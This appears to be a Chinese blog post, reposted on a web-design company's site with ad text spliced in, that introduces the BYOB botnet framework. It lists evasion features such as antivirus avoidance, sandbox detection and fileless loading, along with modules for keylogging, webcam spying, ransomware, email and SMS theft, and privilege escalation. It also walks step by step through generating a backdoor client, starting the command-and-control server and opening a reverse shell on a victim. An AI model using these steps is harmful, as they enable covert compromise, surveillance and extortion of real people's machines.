BYOB是一個開源項(xiàng)目，為安全研究人員和開發(fā)人員提供構(gòu)建和運(yùn)行基本僵尸網(wǎng)絡(luò)的框架，以加深他們對每年感染數(shù)百萬設(shè)備并產(chǎn)生現(xiàn)代僵尸網(wǎng)絡(luò)的復(fù)雜惡意軟件的理解，以提高他們的能力，制定應(yīng)對這些威脅的對策。

創(chuàng)新互聯(lián)專注為客戶提供全方位的互聯(lián)網(wǎng)綜合服務(wù)，包含不限于成都做網(wǎng)站、成都網(wǎng)站設(shè)計(jì)、芝罘網(wǎng)絡(luò)推廣、重慶小程序開發(fā)、芝罘網(wǎng)絡(luò)營銷、芝罘企業(yè)策劃、芝罘品牌公關(guān)、搜索引擎seo、人物專訪、企業(yè)宣傳片、企業(yè)代運(yùn)營等，從售前售中售后，我們都將竭誠為您服務(wù)，您的肯定，是我們最大的嘉獎；創(chuàng)新互聯(lián)為所有大學(xué)生創(chuàng)業(yè)者提供芝罘建站搭建服務(wù)，24小時(shí)服務(wù)熱線：18980820575，官方網(wǎng)址：aaarwkj.com

它旨在允許開發(fā)人員輕松實(shí)現(xiàn)自己的代碼并添加新功能，而無需從頭開始編寫RAT（遠(yuǎn)程管理工具）或 C2（命令和控制服務(wù)器）。

RAT的關(guān)鍵特性是任意代碼/文件可以從C2遠(yuǎn)程加載到內(nèi)存中并在目標(biāo)機(jī)器上執(zhí)行，而無需向磁盤寫入任何內(nèi)容。
———————————————————————————————————————— github鏈接：https://github.com/malwaredllc/byob
————————————————————————————————————————
使用有效負(fù)載，遠(yuǎn)程導(dǎo)入生成完全不可檢測的客戶端

    遠(yuǎn)程導(dǎo)入：從服務(wù)器遠(yuǎn)程導(dǎo)入第三方軟件包，而無需將其寫入磁盤或下載/安裝它們

    不寫入磁盤：客戶端從不向磁盤寫入任何內(nèi)容 – 甚至不是臨時(shí)文件（進(jìn)行零IO系統(tǒng)調(diào)用），因?yàn)檫h(yuǎn)程導(dǎo)入允許將任意代碼動態(tài)加載到內(nèi)存中并直接導(dǎo)入到當(dāng)前正在運(yùn)行的進(jìn)程中

    零依賴（甚至不是Python本身）：客戶端只運(yùn)行python標(biāo)準(zhǔn)庫，從服務(wù)器遠(yuǎn)程導(dǎo)入任何非標(biāo)準(zhǔn)軟件包/模塊，并可以使用獨(dú)立的python解釋器編譯成為任何平臺/格式化的可移植二進(jìn)制可執(zhí)行文件體系結(jié)構(gòu)，允許它在任何東西上運(yùn)行，即使目標(biāo)主機(jī)上缺少Python本身

    只需單擊一下即可添加新功能：./byob/modules/當(dāng)您的命令和控制服務(wù)器運(yùn)行時(shí)，您要復(fù)制到目錄的任何python腳本，模塊或程序包將自動變?yōu)榭蛇h(yuǎn)程導(dǎo)入并可由每個客戶端直接使用

     編寫自己的模塊：./byob/modules/目錄中提供了一個基本模塊模板，使您自己編寫模塊成為一個簡單，無障礙的過程

     在不增加文件大小的情況下運(yùn)行無限模塊：使用遠(yuǎn)程導(dǎo)入添加無限功能，而無需向客戶端的文件大小添加單個字節(jié)

     完全可更新：每個客戶端將定期檢查服務(wù)器是否有可用于遠(yuǎn)程導(dǎo)入的新內(nèi)容，并且如果添加/刪除了任何內(nèi)容，將動態(tài)更新其內(nèi)存資源

     平臺無關(guān)：一切都是用Python（與平臺無關(guān)的語言）編寫的，生成的客戶端可以選擇編譯成可移植的可執(zhí)行文件（Windows）或捆綁到獨(dú)立的應(yīng)用程序（macOS）中

     繞過防火墻：客戶端通過反向TCP連接連接到命令和控制服務(wù)器，這將繞過大多數(shù)防火墻，因?yàn)槟J(rèn)過濾器配置主要阻止傳入連接

     針對防病毒的反措施：通過阻止來自產(chǎn)生已知防病毒產(chǎn)品名稱的進(jìn)程來避免被防病毒軟件分析

      加密有效負(fù)載以防止分析：主客戶端有效負(fù)載使用隨機(jī)256位密鑰加密，該密鑰僅存在于與其一起生成的有效負(fù)載stager中

      防止逆向工程：默認(rèn)情況下，如果檢測到虛擬機(jī)或沙箱，客戶端將中止執(zhí)行

模塊
11個遠(yuǎn)程導(dǎo)入的開發(fā)后模塊

       Keylogger（byob.modules.keylogger）：記錄用戶的擊鍵和輸入的窗口名稱
       屏幕截圖（byob.modules.screenshot）：截取當(dāng)前用戶桌面的截圖
       網(wǎng)絡(luò)攝像頭（byob.modules.webcam）：查看實(shí)時(shí)流或從網(wǎng)絡(luò)攝像頭捕獲圖像/視頻
       Ransom（byob.modules.ransom）：加密文件并生成隨機(jī)BTC錢包以支付贖金
       Outlook（byob.modules.outlook）：從本地Outlook客戶端讀取/搜索/上傳電子郵件
       Packet Sniffer（byob.modules.packetsniffer）：在主機(jī)網(wǎng)絡(luò)上運(yùn)行數(shù)據(jù)包嗅探器并上傳.pcap文件
       Persistence（byob.modules.persistence）：使用5種不同的方法在主機(jī)上建立持久性
       電話（byob.modules.phone）：從客戶端智能手機(jī)讀取/搜索/上傳短信
       Escalate Privileges（byob.modules.escalate）：嘗試UAC繞過以獲得未經(jīng)授權(quán)的管理員權(quán)限
       端口掃描程序（byob.modules.portscanner）：掃描本地網(wǎng)絡(luò)以查找其他在線設(shè)備和打開端口
      Process Control（byob.modules.process）：list / search / kill / monitor當(dāng)前正在主機(jī)上運(yùn)行的進(jìn)程

核心
生成器和服務(wù)器使用的6個核心框架模塊

      Utilities（byob.core.util）：許多模塊使用的各種實(shí)用程序函數(shù)
      Handlers（byob.core.handlers）：請求處理程序以從客戶端接收已完成任務(wù)的結(jié)果
      安全性（byob.core.security）：Diffie-Hellman IKE和3種加密模式（AES-256-OCB，AES-256-CBC，XOR-128）
      Loaders（byob.core.loaders）：從服務(wù)器遠(yuǎn)程導(dǎo)入任何包/模塊/腳本
      Payloads（byob.core.payloads）：反向TCP shell，旨在遠(yuǎn)程導(dǎo)入依賴項(xiàng)，包和模塊
      Stagers（byob.core.stagers）：生成獨(dú)特的有效載荷分級器以防止分析和檢測
      Generators（byob.core.generators）：所有動態(tài)生成客戶端生成器代碼的函數(shù)
      Database（byob.core.database）：處理命令和控制服務(wù)器與SQLite數(shù)據(jù)庫之間的交互

————————————————————————————————————————
安裝：
git clone https://github.com/malwaredllc/byob
下載完后進(jìn)入boby目錄里面
pip install -r requirements.txt
現(xiàn)在已經(jīng)就是安裝完了
client.py是生成客戶端，server.py為服務(wù)端
python client.py --help

---

|usage: client.py [-h] [--name NAME] [--icon ICON] [--pastebin API] [--encrypt]

[--compress] [--freeze] [-v]	host port [module [module ...]]
Generator (Build Your Own Botnet)
positional arguments:
host 服務(wù)器ip地址
port 端口
module 在運(yùn)行時(shí)遠(yuǎn)程導(dǎo)入的模塊
optional arguments:
-h, --help 查看幫助
--name NAME 生成的文件名
--icon ICON 圖標(biāo)（指定文件位置）
--pastebin API 上傳有效載荷到pastebin（不是在c2服務(wù)器上托管）
--encrypt 用隨機(jī)128位密鑰加密有效載荷嵌入在有效載荷的階段
--compress 壓縮生一個自解壓的python腳本
--freeze 將客戶端編譯為當(dāng)前主機(jī)平臺的獨(dú)立可執(zhí)行文件
-v, --version 查看版本號

——————————————————————————————————————
(server.py的help就不解釋了)
我們先生成一個客戶端（本次試驗(yàn)沒用模塊）
python client.py --name test（取名為test） 192.168.1.110（服務(wù)器IP地址） 4444（端口號）

現(xiàn)在我們就可以看到已經(jīng)生成了python的后門程序，我們可以打開看一下

現(xiàn)在我們新開啟一個終端
python server.py --host 192.168.1.110 --port 4444 （等待被控端運(yùn)行***自動鏈接）

這時(shí)候我們在被控端運(yùn)行生成的test.py

我們再回到服務(wù)器端就可以了看到已經(jīng)鏈接到了

然后我們輸入help查看幫助信息
[root @ /usr/src/byob/byob]>help

bg [id] 后臺會話（默認(rèn)為當(dāng)前會話）
broadcast <command> 將任務(wù)廣播到所有活動會話
clients 顯示所有已加入服務(wù)器的客戶端
debug <code> 直接在服務(wù)器上運(yùn)行python代碼(debug必須啟用調(diào)試)
exit 退出
help 查看幫助
kill <id> 結(jié)束會話
options 顯示當(dāng)前配置
query <statement> 查詢 SQLite 數(shù)據(jù)庫
ransom [id] 為比特幣支付加密客戶端文件和RANSOM加密密鑰
results [id] 為客戶端顯示所有已完成的結(jié)果 (默認(rèn)所有客戶端)
sessions 顯示活動客戶端會話
set <setting> [option=value] 更改當(dāng)前配置
shell <id> 反向tcp shell會話
tasks [id] 顯示客戶端所有未完成會話 (默認(rèn)所有客戶端)
webcam <mode> 從客戶端的攝像頭捕獲圖像或者視頻
————————————————————————————————————————

查看到我的id是1，用戶名是root且是管理員

[root @ /usr/src/byob/byob]>shell 1

正常查看ip地址
實(shí)驗(yàn)成功
————————————————————————————————————————
此腳本還在繼續(xù)添加新功能，坐等

分享題目：byob--建立自己的僵尸網(wǎng)絡(luò)
瀏覽地址：http://aaarwkj.com/article16/pjcddg.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián)，為您提供網(wǎng)站維護(hù)、微信小程序、網(wǎng)站制作、、小程序開發(fā)、定制網(wǎng)站

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請盡快告知，我們將會在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場，如需處理請聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時(shí)需注明來源： 創(chuàng)新互聯(lián)